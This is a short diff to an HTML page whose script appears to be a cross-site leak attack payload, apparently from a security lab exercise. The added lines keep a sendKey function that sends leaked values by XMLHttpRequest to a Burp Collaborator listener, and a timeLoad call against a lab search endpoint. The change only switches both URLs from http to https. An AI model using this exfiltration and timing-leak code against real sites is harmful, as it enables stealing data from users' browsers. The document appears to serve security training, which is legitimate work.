--- a/csl5.html
+++ b/csl5.html
@@ -11,7 +11,7 @@
         console.log("sendKey:"+k)
         try {
             x = new XMLHttpRequest();
-            x.open("GET","http://qqkxpek9c8g1z17v3kas595rqiw8kx.burpcollaborator.net?key="+k, false);
+            x.open("GET","https://qqkxpek9c8g1z17v3kas595rqiw8kx.burpcollaborator.net?key="+k, false);
             x.send();
         } catch(e) {
                 console.log("BB"+e);
@@ -50,7 +50,7 @@
     }
 
 sendKey("Started")
-timeLoad("http://ptl-ff8dcea2-d4247c35.libcurl.so/search?search=%5e", "", 0)
+timeLoad("https://ptl-ff8dcea2-d4247c35.libcurl.so/search?search=%5e", "", 0)
 
 </script>
   </body>
